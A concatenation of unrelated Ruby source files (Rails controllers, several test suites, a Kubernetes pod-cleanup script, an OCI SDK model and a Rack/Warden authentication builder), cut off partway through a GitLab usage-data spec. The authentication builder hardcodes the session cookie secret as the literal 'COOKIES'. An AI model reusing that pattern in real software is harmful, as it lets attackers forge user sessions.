module NYCCorp VERSION = "0.1.0" end
class Rpt::AttendeeReportsController < Rpt::AbstractReportController def show @attendees = Attendee.yr(@year).with_planlessness(planlessness) respond_to do |format| format.html do @attendee_count = @attendees.count @user_count = User.yr(@year).count @planless_attendee_count = Attendee.yr(@year).planless.count @planful_attendee_count = Attendee.yr(@year).count - @planless_attendee_count render :show end format.csv do csv = AttendeesCsvExporter.render(@year, @attendees) send_data csv, filename: csv_filename, type: 'text/csv' end end end private def csv_filename "usgc_attendees_#{Time.current.strftime("%Y-%m-%d")}.csv" end def planlessness p = params[:planlessness] %w[all planful planless].include?(p) ? p.to_sym : :all end end
class QuestionsController < ApplicationController before_action :find_question, except: [:new, :create] before_action :validate_admin def show respond_to do |format| format.html { render :show } format.json { render json: @question} end end def new @concept = Concept.find(params[:concept_id]) @question = Question.new() end def create @concept = Concept.find(params[:concept_id]) @question = Question.create(question_params) question_action(:save, 'create') end def edit @wrong_answers = @question.wrong_answers end def update @question.update(question_params) question_action(:save, "update") end def destroy question_action(:destroy, "delete") end private def find_question @question = Question.find(params[:id]) @concept = @question.concept end def question_action(action, type) if @question.send(action) redirect_to concept_path(@concept), {notice: "Successfully #{type}d question!"} else case type when "update" render :edit when "create" render :new else redirect_to request.referrer, {alert: "Sorry, could not #{type} question!"} end end end def rando_params params.require(:rando).permit(:name, :question_id) end def question_params params.require(:question).permit(:inquest, :answer, :concept_id, :user_id, :difficulty, wrong_answers: []) end end
require 'test_helper' require "authlogic/test_case" # include at the top of test_helper.rb class RecipesControllerTest < ActionController::TestCase setup do @recipe = recipes(:one) end setup :activate_authlogic test "should get index" do get :index assert_response :success get :index, format: 'json' assert_response :success end test "should be redirect to signin_path on get new" do get :new assert_redirected_to signup_path end test "should be redirect to a random recipe path" do get :shuffle assert_redirected_to %r(/recipes/[0-9]+) end test "should get new" do UserSession.create(users(:ben)) get :new assert_response :success end test "should not create recipe because no one is connected" do assert_no_difference('Recipe.count') do post :create, recipe: { name: "hello" } end end test "should create a recipe" do UserSession.create(users(:ben)) assert_difference('Recipe.count', 1) do post :create, recipe: { name: "hello" } end end test "should import a recipe from 750g" do UserSession.create(users(:ben)) assert_difference('Recipe.count', 1) do post :create, recipe: { name: "http://www.750g.com/bowl-cake-r100568.htm" } end end test "should import a recipe from marmiton" do UserSession.create(users(:ben)) assert_difference('Recipe.count', 1) do post :create, recipe: { name: "http://www.750g.com/bowl-cake-r100568.htm" } end end test "should import a recipe from cuisineaz" do UserSession.create(users(:ben)) assert_difference('Recipe.count', 1) do post :create, recipe: { name: "http://www.cuisineaz.com/recettes/roules-de-poulet-et-jambon-farcis-sauce-foie-gras-66302.aspx" } end end test "should not import a recipe because url is not valid" do UserSession.create(users(:ben)) assert_no_difference('Recipe.count') do post :create, recipe: { name: "https://www.google.fr" } assert_redirected_to new_recipe_path end end test "should be redirected to signup path when non-logged user want create a recipe" do get :create assert_redirected_to signup_path end test "should show recipe" do get :show, id: @recipe assert_response :success get :show, id: @recipe, format: 'json' assert_response :success end test "should show recipe by it's slug" do @recipe.name = 'an very unique name' @recipe.save! get :show, id: @recipe.friendly_id assert_response :success get :show, id: @recipe.friendly_id, format: 'json' assert_response :success end test "should be redirect to signin_path on Recipes#Edit" do get :edit, id: @recipe assert_redirected_to signup_path end test "should edit recipe" do #try to edit as me UserSession.create(users(:me)) get :edit, id: @recipe assert_response :success end test "should not edit recipe because current_user is not the author" do #try to edit as me UserSession.create(users(:ben)) get :edit, id: @recipe assert_redirected_to '/' end test "should not add allergens recipe" do assert_no_difference '@recipe.allergens.count' do patch :update, id: @recipe, recipe: { allergens: { 1 => 1}} end end test "should add allergens recipe" do UserSession.create(users(:me)) assert_difference '@recipe.allergens.count' do patch :update, id: @recipe, recipe: { allergens: { 1 => 1}} end end test "should remove allergens recipe" do UserSession.create(users(:me)) @recipe.allergens << Allergen.find(1) assert_difference '@recipe.allergens.count', -1 do patch :update, id: @recipe, recipe: { allergens: {}} end end test "should update recipe" do UserSession.create(users(:me)) patch :update, id: @recipe, recipe: { ingredients: 'hello' } @recipe.reload assert_equal 'hello', @recipe.ingredients # if recipe was savec correctly, we should get a new slug so we should be redirected to friendly url end test "should not update recipe because current_user is not the author" do UserSession.create(users(:ben)) patch :update, id: @recipe, recipe: { name: 'hello' } assert_redirected_to '/' end test "should destroy recipe" do UserSession.create(users(:me)) assert_difference('Recipe.count', -1) do delete :destroy, id: @recipe end end test "should not destroy recipe because current_user is not the author" do UserSession.create(users(:ben)) assert_no_difference('Recipe.count') do delete :destroy, id: @recipe end end test "should increment number of view when a recipe is consulted" do recipe = recipes(:one) assert_difference('recipe.count_views', 1) do get :show, id: recipe assert_response :success end end end
require "inline_attachment"
FactoryGirl.define do factory :kudoer do first_name "Lukasz" last_name "Lenart" email "lukasz@sml.com" password "testtest" password_confirmation "testtest" end end
#!/usr/bin/env ruby require File.join(".", File.dirname(__FILE__), "..", "lib", "cp_env") # This script will delete any pods which are: # # * not part of a ReplicaSet # * and not in kube-system # * and have been running for more than 2 days # # Such pods prevent the node-recycler from draining a node to # replace it. # # NB: The script has a 'dry-run' mode, in which pods will be listed # but not deleted. To use this, pass the string `--dry-run` as the # first and only argument. # # Developers need to run manual pods for tasks such as port-forwarding # to a database, but there's no good reason for such a pod to still be # running after 48 hours. If pods should always be running, they should # be part of a deployment (and hence a ReplicaSet). # # The script requires the following environment variables: # # export PIPELINE_CLUSTER=live-1.cloud-platform.service.justice.gov.uk # # It also needs to be able to run: # # kubectl config use-context #{cluster} # cluster = ENV.fetch("PIPELINE_CLUSTER") dry_run = ARGV.shift == "--dry-run" if dry_run log("green", "Dry run: detecting manually created pods in #{cluster}") else log("green", "Deleting manually created pods in #{cluster}") end set_kube_context(cluster) CpEnv::ManuallyCreatedPodDeleter.new(dry_run: dry_run).run log("green", "Done.")
require 'haml_lint/cli' describe HamlLint::CLI do let(:io) { StringIO.new } let(:output) { io.string } let(:logger) { HamlLint::Logger.new(io) } let(:cli) { described_class.new(logger) } describe '#run' do subject { cli.run(args) } let(:args) { [] } let(:options) { HamlLint::Options.new } it 'passes the arguments to the Options#parse method' do HamlLint::Options.any_instance.should_receive(:parse).with(args) subject end context 'when no arguments are given' do before { HamlLint::Runner.any_instance.stub(:run) } it 'scans for lints' do HamlLint::Runner.any_instance.should_receive(:run) subject end end context 'when arguments are given' do let(:args) { %w[file.haml some-view-*.haml] } before { HamlLint::Runner.any_instance.stub(:run) } it 'scans for lints' do HamlLint::Runner.any_instance.should_receive(:run) subject end end context 'when passed the --color flag' do let(:args) { ['--color'] } it 'sets the logger to output in color' do subject logger.color_enabled.should == true end context 'and the output stream is not a TTY' do before do io.stub(:tty?).and_return(false) end it 'sets the logger to output in color' do subject logger.color_enabled.should == true end end end context 'when passed the --no-color flag' do let(:args) { ['--no-color'] } it 'sets the logger to not output in color' do subject logger.color_enabled.should == false end end context 'when --[no-]color flag is not specified' do before do io.stub(:tty?).and_return(tty) end context 'and the output stream is a TTY' do let(:tty) { true } it 'sets the logger to output in color' do subject logger.color_enabled.should == true end end context 'and the output stream is not a TTY' do let(:tty) { false } it 'sets the logger to not output in color' do subject logger.color_enabled.should == false end end end context 'when passed the --show-linters flag' do let(:args) { ['--show-linters'] } let(:fake_linter) do linter = double('linter') linter.stub(:name).and_return('FakeLinter') linter end before do HamlLint::LinterRegistry.stub(:linters).and_return([fake_linter]) end it 'displays the available linters' do subject output.should include 'FakeLinter' end it { should == Sysexits::EX_OK } end context 'when passed the --show-reporters flag' do let(:args) { ['--show-reporters'] } it 'displays the available reporters' do subject output.should include 'default' output.should include 'json' end it { should == Sysexits::EX_OK } end context 'when passed the --help flag' do let(:args) { ['--help'] } it 'displays usage information' do subject output.should include HamlLint::APP_NAME output.should include 'Usage' end end context 'when passed the --version flag' do let(:args) { ['--version'] } it 'displays the application name' do subject output.should include HamlLint::APP_NAME end it 'displays the version' do subject output.should include HamlLint::VERSION end end context 'when passed the --verbose-version flag' do let(:args) { ['--verbose-version'] } it 'displays the application name' do subject output.should include HamlLint::APP_NAME end it 'displays the version' do subject output.should include HamlLint::VERSION end it 'displays the Haml version' do subject output.should include "haml #{Gem.loaded_specs['haml'].version}" end it 'displays the RuboCop version' do subject output.should include "rubocop #{Gem.loaded_specs['rubocop'].version}" end it 'displays the Ruby version' do subject output.should include RUBY_DESCRIPTION end end context 'when a ConfigurationError is raised' do before do cli.stub(:act_on_options).and_raise(HamlLint::Exceptions::ConfigurationError) end it { should == Sysexits::EX_CONFIG } end context 'when an InvalidCLIOption error is raised' do before do cli.stub(:act_on_options).and_raise(HamlLint::Exceptions::InvalidCLIOption) end it { should == Sysexits::EX_USAGE } end context 'when an InvalidFilePath error is raised' do before do cli.stub(:act_on_options).and_raise(HamlLint::Exceptions::InvalidFilePath) end it { should == Sysexits::EX_NOINPUT } end context 'when a NoLintersError is raised' do before do cli.stub(:act_on_options).and_raise(HamlLint::Exceptions::NoLintersError) end it { should == Sysexits::EX_NOINPUT } end context 'when an unhandled exception occurs' do let(:backtrace) { %w[file1.rb:1 file2.rb:2] } let(:error_msg) { 'Oops' } let(:exception) do StandardError.new(error_msg).tap { |e| e.set_backtrace(backtrace) } end before { cli.stub(:act_on_options).and_raise(exception) } it 'displays error message' do subject output.should include error_msg end it 'displays backtrace' do subject output.should include backtrace.join("\n") end it 'displays link to bug report URL' do subject output.should include HamlLint::BUG_REPORT_URL end it 'displays the Haml-Lint version' do subject output.should include "Haml-Lint version: #{HamlLint::VERSION}" end it 'displays the Haml version' do subject output.should include "Haml version: #{Gem.loaded_specs['haml'].version}" end it 'displays the RuboCop version' do subject output.should include "RuboCop version: #{Gem.loaded_specs['rubocop'].version}" end it 'displays the Ruby version' do subject output.should include "Ruby version: #{RUBY_VERSION}" end it { should == Sysexits::EX_SOFTWARE } end end end
require 'rack/builder' require 'warden' require 'rails_warden' if defined?('Rails') require 'omniauth-music_glue' require 'music_glue/tyson/middleware' require 'music_glue/tyson/missing_authentication' require 'music_glue/tyson/strategies/omniauth' class MusicGlue::Tyson::Builder def self.new(app, options = {}) builder = ::Rack::Builder.new warden_stratagies = options[:warden_stratagies] || [:omniauth] warden_failure_app = options[:failure_app] || MusicGlue::Tyson::MissingAuthentication @user_authenticator = options[:user_authenticator] oauth_id, oauth_secret, oauth_options = extract_options!(options) unless options[:disabled] builder.use OmniAuth::Builder do provider :music_glue, oauth_id, oauth_secret, oauth_options end builder.use(Rack::Session::Cookie, :secret => "COOKIES") unless defined?('RailsWarden') builder.use warden_manager do |manager| manager.default_strategies warden_stratagies manager.failure_app = warden_failure_app Warden::Strategies.add :omniauth, MusicGlue::Tyson::Strategies::Omniauth Warden::Manager.serialize_into_session do |user| user.attributes end Warden::Manager.serialize_from_session do |attrs| MusicGlue::Tyson::User.new attrs end end end builder.run MusicGlue::Tyson::Middleware.new(app, options) builder end def self.extract_options!(options) oauth = options[:oauth] || {} oauth_options = options[:oauth_options] || {} id, secret = oauth[:id], oauth[:secret] if id.nil? || secret.nil? || id.empty? || secret.empty? if options[:fail_without_config] fail 'music_glue-tyson requires :id and :secret oauth options in this environment.' else logger.warn "music_glue-tyson is disabled because it's :id or :secret oauth options are missing." end options[:disabled] = true end [id, secret, oauth_options] end def self.logger @logger ||= if defined?('Rails') Rails.logger else Logger.new STDOUT end end def self.warden_manager if defined?('RailsWarden') RailsWarden::Manager else Warden::Manager end end end
# Copyright (c) 2016, 2019, Oracle and/or its affiliates. All rights reserved. require 'date' require 'logger' # rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength module OCI # An object returned in the event of a work request error. class LoadBalancer::Models::WorkRequestError ERROR_CODE_ENUM = [ ERROR_CODE_BAD_INPUT = 'BAD_INPUT'.freeze, ERROR_CODE_INTERNAL_ERROR = 'INTERNAL_ERROR'.freeze, ERROR_CODE_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze ].freeze # This attribute is required. # @return [String] attr_reader :error_code # **[Required]** A human-readable error string. # @return [String] attr_accessor :message # Attribute mapping from ruby-style variable name to JSON key. def self.attribute_map { # rubocop:disable Style/SymbolLiteral 'error_code': :'errorCode', 'message': :'message' # rubocop:enable Style/SymbolLiteral } end # Attribute type mapping. def self.swagger_types { # rubocop:disable Style/SymbolLiteral 'error_code': :'String', 'message': :'String' # rubocop:enable Style/SymbolLiteral } end # rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity # rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral # Initializes the object # @param [Hash] attributes Model attributes in the form of hash # @option attributes [String] :error_code The value to assign to the {#error_code} property # @option attributes [String] :message The value to assign to the {#message} property def initialize(attributes = {}) return unless attributes.is_a?(Hash) # convert string to symbol for hash key attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v } self.error_code = attributes[:'errorCode'] if attributes[:'errorCode'] raise 'You cannot provide both :errorCode and :error_code' if attributes.key?(:'errorCode') && attributes.key?(:'error_code') self.error_code = attributes[:'error_code'] if attributes[:'error_code'] self.message = attributes[:'message'] if attributes[:'message'] end # rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity # rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral # Custom attribute writer method checking allowed values (enum). # @param [Object] error_code Object to be assigned def error_code=(error_code) # rubocop:disable Style/ConditionalAssignment if error_code && !ERROR_CODE_ENUM.include?(error_code) OCI.logger.debug("Unknown value for 'error_code' [" + error_code + "]. Mapping to 'ERROR_CODE_UNKNOWN_ENUM_VALUE'") if OCI.logger @error_code = ERROR_CODE_UNKNOWN_ENUM_VALUE else @error_code = error_code end # rubocop:enable Style/ConditionalAssignment end # rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines # Checks equality by comparing each attribute. # @param [Object] other the other object to be compared def ==(other) return true if equal?(other) self.class == other.class && error_code == other.error_code && message == other.message end # rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines # @see the `==` method # @param [Object] other the other object to be compared def eql?(other) self == other end # rubocop:disable Metrics/AbcSize, Layout/EmptyLines # Calculates hash code according to all attributes. # @return [Fixnum] Hash code def hash [error_code, message].hash end # rubocop:enable Metrics/AbcSize, Layout/EmptyLines # rubocop:disable Metrics/AbcSize, Layout/EmptyLines # Builds the object from hash # @param [Hash] attributes Model attributes in the form of hash # @return [Object] Returns the model itself def build_from_hash(attributes) return nil unless attributes.is_a?(Hash) self.class.swagger_types.each_pair do |key, type| if type =~ /^Array<(.*)>/i # check to ensure the input is an array given that the the attribute # is documented as an array but the input is not if attributes[self.class.attribute_map[key]].is_a?(Array) public_method("#{key}=").call( attributes[self.class.attribute_map[key]] .map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) } ) end elsif !attributes[self.class.attribute_map[key]].nil? public_method("#{key}=").call( OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]]) ) end # or else data not found in attributes(hash), not an issue as the data can be optional end self end # rubocop:enable Metrics/AbcSize, Layout/EmptyLines # Returns the string representation of the object # @return [String] String presentation of the object def to_s to_hash.to_s end # Returns the object in the form of hash # @return [Hash] Returns the object in the form of hash def to_hash hash = {} self.class.attribute_map.each_pair do |attr, param| value = public_method(attr).call next if value.nil? && !instance_variable_defined?("@#{attr}") hash[param] = _to_hash(value) end hash end private # Outputs non-array value in the form of hash # For object, use to_hash. Otherwise, just return the value # @param [Object] value Any valid value # @return [Hash] Returns the value in the form of hash def _to_hash(value) if value.is_a?(Array) value.compact.map { |v| _to_hash(v) } elsif value.is_a?(Hash) {}.tap do |hash| value.each { |k, v| hash[k] = _to_hash(v) } end elsif value.respond_to? :to_hash value.to_hash else value end end end end # rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
class AuthToken < ApplicationRecord has_secure_token :value end
class EnPayment < ApplicationRecord belongs_to :consumer validates :day, numericality: { less_than_or_equal_to: 31, greater_than: 0 } validates :percent, numericality: { less_than_or_equal_to: 100, greater_than: 0 } validates_with PercentValidator end
require 'test/unit' require 'test/test_helper' require 'rbconfig' require 'jruby/path_helper' def load_behavior_block(&block) eval("__FILE__", block.binding) end class TestLoad < Test::Unit::TestCase include TestHelper def setup @prev_loaded_features = $LOADED_FEATURES.dup @prev_load_path = $LOAD_PATH.dup end def teardown $LOADED_FEATURES.clear $LOADED_FEATURES.concat(@prev_loaded_features) $LOAD_PATH.clear $LOAD_PATH.concat(@prev_load_path) end def test_require # Allow us to run MRI against non-Java dependent tests if RUBY_PLATFORM=~/java/ $ruby_init = false file = __FILE__ if (File::Separator == '\\') file.gsub!('\\\\', '/') end # JRUBY-1229, allow loading jar files without manifest assert_nothing_raised { require "test/jar_with_no_manifest.jar" } end assert require('test/requireTarget') assert !require('test/requireTarget') $loaded_foo_bar = false assert require('test/foo.bar') assert $loaded_foo_bar end # JRUBY-3231 def test_load_with_empty_string_in_loadpath begin $:.unshift("") $loaded_foo_bar = false assert load('test/foo.bar.rb') assert $loaded_foo_bar ensure $:.shift end end def test_require_bogus assert_raises(LoadError) { require 'foo/' } assert_raises(LoadError) { require '' } # Yes, the following line is supposed to appear twice assert_raises(LoadError) { require 'NonExistantRequriedFile'} assert_raises(LoadError) { require 'NonExistantRequriedFile'} end def test_require_jar_should_make_its_scripts_accessible $hello = nil require 'test/jar_with_ruby_files' require 'hello_from_jar' assert "hi", $hello end def test_require_nested_jar_should_make_its_scripts_accessible $hello = nil require 'test/jar_with_ruby_files_in_jar' require 'jar_with_ruby_file' require 'hello_from_nested_jar' assert "hi from nested jar", $hello end def test_require_nested_jar_enables_class_loading_from_that_jar require 'test/jar_with_nested_classes_jar' require 'jar_with_classes' java_import "test.HelloThere" assert HelloThere.new.message end def call_extern_load_foo_bar(classpath = nil) cmd = "" cmd += "env CLASSPATH=#{classpath}" # classpath=nil, becomes empty CLASSPATH cmd += " #{Config::CONFIG['bindir']}/#{Config::CONFIG['RUBY_INSTALL_NAME']} -e " cmd += "'"+'begin load "./test/foo.bar.rb"; rescue Exception => e; print "FAIL"; else print "OK"; end'+"'" `#{cmd}` end unless WINDOWS # FIXME for Windows def test_load_relative_with_classpath assert_equal call_extern_load_foo_bar(File.join('test', 'jar_with_ruby_files.jar')), 'OK' end def test_load_relative_with_classpath_ends_colon assert_equal call_extern_load_foo_bar(File.join('test', 'jar_with_ruby_files.jar') + ':'), 'OK' end def test_load_relative_without_classpath assert_equal 'OK', call_extern_load_foo_bar() end end def test_require_with_non_existent_jar_1 $:.unshift "file:/someHopefullyUnexistentJarFile.jar/" filename = File.join(File.dirname(__FILE__), "blargus1.rb") require_name = File.join(File.dirname(__FILE__), "blargus1") assert !defined?($_blargus_has_been_loaded_oh_yeah_baby_1) File.open(filename, "w") do |f| f.write <<OUT $_blargus_has_been_loaded_oh_yeah_baby_1 = true OUT end require require_name assert $_blargus_has_been_loaded_oh_yeah_baby_1 ensure File.unlink(filename) rescue nil $:.shift end def test_require_with_non_existent_jar_2 $:.unshift "file:/someHopefullyUnexistentJarFile.jar" filename = File.join(File.dirname(__FILE__), "blargus2.rb") require_name = File.join(File.dirname(__FILE__), "blargus2") assert !defined?($_blargus_has_been_loaded_oh_yeah_baby_2) File.open(filename, "w") do |f| f.write <<OUT $_blargus_has_been_loaded_oh_yeah_baby_2 = true OUT end require require_name assert $_blargus_has_been_loaded_oh_yeah_baby_2 ensure File.unlink(filename) rescue nil $:.shift end def test_require_with_non_existent_jar_3 $:.unshift "file:/someHopefullyUnexistentJarFile.jar!/dir/inside/that/doesnt/work" filename = File.join(File.dirname(__FILE__), "blargus3.rb") require_name = File.join(File.dirname(__FILE__), "blargus3") assert !defined?($_blargus_has_been_loaded_oh_yeah_baby_3) File.open(filename, "w") do |f| f.write <<OUT $_blargus_has_been_loaded_oh_yeah_baby_3 = true OUT end require require_name assert $_blargus_has_been_loaded_oh_yeah_baby_3 ensure File.unlink(filename) rescue nil $:.shift end def test_overriding_require_shouldnt_cause_problems eval(<<DEPS, binding, "deps") class ::Object alias old_require require def require(file) old_require(file) end end DEPS require 'test/test_loading_behavior' res = File.expand_path($loading_behavior_result) assert_equal File.expand_path(File.join('test', 'test_loading_behavior.rb')), res end # JRUBY-3894 def test_require_relative_from_jar_in_classpath $CLASSPATH << File.join( File.dirname(__FILE__), 'jar_with_relative_require1.jar') require 'test/require_relative1' assert $loaded_relative_foo end # JRUBY-4875 def test_require_relative_from_jar_in_classpath_with_different_cwd Dir.chdir("test") do $CLASSPATH << File.join(File.dirname(__FILE__), 'jar_with_relative_require1.jar') require 'test/require_relative1' assert $loaded_relative_foo end end def test_loading_jar_with_dot_so assert_nothing_raised { require 'test/jruby-3977.so.jar' load 'jruby-3977.rb' assert $jruby3977 } end # JRUBY-5045 def test_cwd_plus_dotdot_jar_loading $hello = nil require './test/../test/jar_with_ruby_files' require 'hello_from_jar' assert "hi", $hello end end
# frozen_string_literal: true require 'spec_helper' RSpec.describe Gitlab::UsageData, :aggregate_failures do include UsageDataHelpers before do stub_usage_data_connections stub_object_store_settings clear_memoized_values(described_class::CE_MEMOIZED_VALUES) end describe '.uncached_data' do subject { described_class.uncached_data } it 'includes basic top and second level keys' do is_expected.to include(:counts) is_expected.to include(:counts_monthly) is_expected.to include(:counts_weekly) is_expected.to include(:license) is_expected.to include(:settings) # usage_activity_by_stage data is_expected.to include(:usage_activity_by_stage) is_expected.to include(:usage_activity_by_stage_monthly) expect(subject[:usage_activity_by_stage]) .to include(:configure, :create, :manage, :monitor, :plan, :release, :verify) expect(subject[:usage_activity_by_stage_monthly]) .to include(:configure, :create, :manage, :monitor, :plan, :release, :verify) expect(subject[:usage_activity_by_stage][:create]) .not_to include(:merge_requests_users) expect(subject[:usage_activity_by_stage_monthly][:create]) .to include(:merge_requests_users) expect(subject[:counts_weekly]).to include(:aggregated_metrics) expect(subject[:counts_monthly]).to include(:aggregated_metrics) end it 'clears memoized values' do allow(described_class).to receive(:clear_memoization) subject described_class::CE_MEMOIZED_VALUES.each do |key| expect(described_class).to have_received(:clear_memoization).with(key) end end it 'ensures recorded_at is set before any other usage data calculation' do %i(alt_usage_data redis_usage_data distinct_count count).each do |method| expect(described_class).not_to receive(method) end expect(described_class).to receive(:recorded_at).and_raise(Exception.new('Stopped calculating recorded_at')) expect { subject }.to raise_error('Stopped calculating recorded_at') end context 'when generating usage ping in critical weeks' do it 'does not raise error when generated in last week of the year' do travel_to(DateTime.parse('2020-12-29')) do expect { subject }.not_to raise_error end end it 'does not raise error when generated in first week of the year' do travel_to(DateTime.parse('2021-01-01')) do expect { subject }.not_to raise_error end end it 'does not raise error when generated in second week of the year' do travel_to(DateTime.parse('2021-01-07')) do expect { subject }.not_to raise_error end end it 'does not raise error when generated in 3rd week of the year' do travel_to(DateTime.parse('2021-01-14')) do expect { subject }.not_to raise_error end end end end describe 'usage_activity_by_stage_package' do it 'includes accurate usage_activity_by_stage data' do for_defined_days_back do create(:project, packages: [create(:package)] ) end expect(described_class.usage_activity_by_stage_package({})).to eq( projects_with_packages: 2 ) expect(described_class.usage_activity_by_stage_package(described_class.last_28_days_time_period)).to eq( projects_with_packages: 1 ) end end describe '.usage_activity_by_stage_configure' do it 'includes accurate usage_activity_by_stage data' do for_defined_days_back do user = create(:user) cluster = create(:cluster, user: user) create(:clusters_applications_cert_manager, :installed, cluster: cluster) create(:clusters_applications_helm, :installed, cluster: cluster) create(:clusters_applications_ingress, :installed, cluster: cluster) create(:clusters_applications_knative, :installed, cluster: cluster) create(:cluster, :disabled, user: user) create(:cluster_provider_gcp, :created) create(:cluster_provider_aws, :created) create(:cluster_platform_kubernetes) create(:cluster, :group, :disabled, user: user) create(:cluster, :group, user: user) create(:cluster, :instance, :disabled, :production_environment) create(:cluster, :instance, :production_environment) create(:cluster, :management_project) end expect(described_class.usage_activity_by_stage_configure({})).to include( clusters_applications_cert_managers: 2, clusters_applications_helm: 2, clusters_applications_ingress: 2, clusters_applications_knative: 2, clusters_management_project: 2, clusters_disabled: 4, clusters_enabled: 12, clusters_platforms_gke: 2, clusters_platforms_eks: 2, clusters_platforms_user: 2, instance_clusters_disabled: 2, instance_clusters_enabled: 2, group_clusters_disabled: 2, group_clusters_enabled: 2, project_clusters_disabled: 2, project_clusters_enabled: 10 ) expect(described_class.usage_activity_by_stage_configure(described_class.last_28_days_time_period)).to include( clusters_applications_cert_managers: 1, clusters_applications_helm: 1, clusters_applications_ingress: 1, clusters_applications_knative: 1, clusters_management_project: 1, clusters_disabled: 2, clusters_enabled: 6, clusters_platforms_gke: 1, clusters_platforms_eks: 1, clusters_platforms_user: 1, instance_clusters_disabled: 1, instance_clusters_enabled: 1, group_clusters_disabled: 1, group_clusters_enabled: 1, project_clusters_disabled: 1, project_clusters_enabled: 5 ) end end describe 'usage_activity_by_stage_create' do it 'includes accurate usage_activity_by_stage data' do for_defined_days_back do user = create(:user) project = create(:project, :repository_private, :test_repo, :remote_mirror, creator: user) create(:merge_request, source_project: project) create(:deploy_key, user: user) create(:key, user: user) create(:project, creator: user, disable_overriding_approvers_per_merge_request: true) create(:project, creator: user, disable_overriding_approvers_per_merge_request: false) create(:remote_mirror, project: project) create(:snippet, author: user) end expect(described_class.usage_activity_by_stage_create({})).to include( deploy_keys: 2, keys: 2, merge_requests: 2, projects_with_disable_overriding_approvers_per_merge_request: 2, projects_without_disable_overriding_approvers_per_merge_request: 4, remote_mirrors: 2, snippets: 2 ) expect(described_class.usage_activity_by_stage_create(described_class.last_28_days_time_period)).to include( deploy_keys: 1, keys: 1, merge_requests: 1, projects_with_disable_overriding_approvers_per_merge_request: 1, projects_without_disable_overriding_approvers_per_merge_request: 2, remote_mirrors: 1, snippets: 1 ) end end describe 'usage_activity_by_stage_manage' do it 'includes accurate usage_activity_by_stage data' do stub_config( omniauth: { providers: omniauth_providers } ) allow(Devise).to receive(:omniauth_providers).and_return(%w(ldapmain ldapsecondary group_saml)) for_defined_days_back do user = create(:user) user2 = create(:user) create(:event, author: user) create(:group_member, user: user) create(:authentication_event, user: user, provider: :ldapmain, result: :success) create(:authentication_event, user: user2, provider: :ldapsecondary, result: :success) create(:authentication_event, user: user2, provider: :group_saml, result: :success) create(:authentication_event, user: user2, provider: :group_saml, result: :success) create(:authentication_event, user: user, provider: :group_saml, result: :failed) end expect(described_class.usage_activity_by_stage_manage({})).to include( events: 2, groups: 2, users_created: 6, omniauth_providers: ['google_oauth2'], user_auth_by_provider: { 'group_saml' => 2, 'ldap' => 4, 'standard' => 0, 'two-factor' => 0, 'two-factor-via-u2f-device' => 0, "two-factor-via-webauthn-device" => 0 } ) expect(described_class.usage_activity_by_stage_manage(described_class.last_28_days_time_period)).to include( events: 1, groups: 1, users_created: 3, omniauth_providers: ['google_oauth2'], user_auth_by_provider: { 'group_saml' => 1, 'ldap' => 2, 'standard' => 0, 'two-factor' => 0, 'two-factor-via-u2f-device' => 0, "two-factor-via-webauthn-device" => 0 } ) end it 'includes import gmau usage data' do for_defined_days_back do user = create(:user) group = create(:group) group.add_owner(user) create(:project, import_type: :github, creator_id: user.id) create(:jira_import_state, :finished, project: create(:project, creator_id: user.id)) create(:issue_csv_import, user: user) create(:group_import_state, group: group, user: user) create(:bulk_import, user: user) end expect(described_class.usage_activity_by_stage_manage({})).to include( unique_users_all_imports: 10 ) expect(described_class.usage_activity_by_stage_manage(described_class.last_28_days_time_period)).to include( unique_users_all_imports: 5 ) end it 'includes imports usage data' do for_defined_days_back do user = create(:user) %w(gitlab_project gitlab github bitbucket bitbucket_server gitea git manifest fogbugz phabricator).each do |type| create(:project, import_type: type, creator_id: user.id) end jira_project = create(:project, creator_id: user.id) create(:jira_import_state, :finished, project: jira_project) create(:issue_csv_import, user: user) group = create(:group) group.add_owner(user) create(:group_import_state, group: group, user: user) bulk_import = create(:bulk_import, user: user) create(:bulk_import_entity, :group_entity, bulk_import: bulk_import) create(:bulk_import_entity, :project_entity, bulk_import: bulk_import) end expect(described_class.usage_activity_by_stage_manage({})).to include( { bulk_imports: { gitlab_v1: 2, gitlab: Gitlab::UsageData::DEPRECATED_VALUE }, project_imports: { bitbucket: 2, bitbucket_server: 2, git: 2, gitea: 2, github: 2, gitlab: 2, gitlab_migration: 2, gitlab_project: 2, manifest: 2 }, issue_imports: { jira: 2, fogbugz: 2, phabricator: 2, csv: 2 }, group_imports: { group_import: 2, gitlab_migration: 2 }, projects_imported: { total: Gitlab::UsageData::DEPRECATED_VALUE, gitlab_project: Gitlab::UsageData::DEPRECATED_VALUE, gitlab: Gitlab::UsageData::DEPRECATED_VALUE, github: Gitlab::UsageData::DEPRECATED_VALUE, bitbucket: Gitlab::UsageData::DEPRECATED_VALUE, bitbucket_server: Gitlab::UsageData::DEPRECATED_VALUE, gitea: Gitlab::UsageData::DEPRECATED_VALUE, git: Gitlab::UsageData::DEPRECATED_VALUE, manifest: Gitlab::UsageData::DEPRECATED_VALUE }, issues_imported: { jira: Gitlab::UsageData::DEPRECATED_VALUE, fogbugz: Gitlab::UsageData::DEPRECATED_VALUE, phabricator: Gitlab::UsageData::DEPRECATED_VALUE, csv: Gitlab::UsageData::DEPRECATED_VALUE }, groups_imported: Gitlab::UsageData::DEPRECATED_VALUE } ) expect(described_class.usage_activity_by_stage_manage(described_class.last_28_days_time_period)).to include( { bulk_imports: { gitlab_v1: 1, gitlab: Gitlab::UsageData::DEPRECATED_VALUE }, project_imports: { bitbucket: 1, bitbucket_server: 1, git: 1, gitea: 1, github: 1, gitlab: 1, gitlab_migration: 1, gitlab_project: 1, manifest: 1 }, issue_imports: { jira: 1, fogbugz: 1, phabricator: 1, csv: 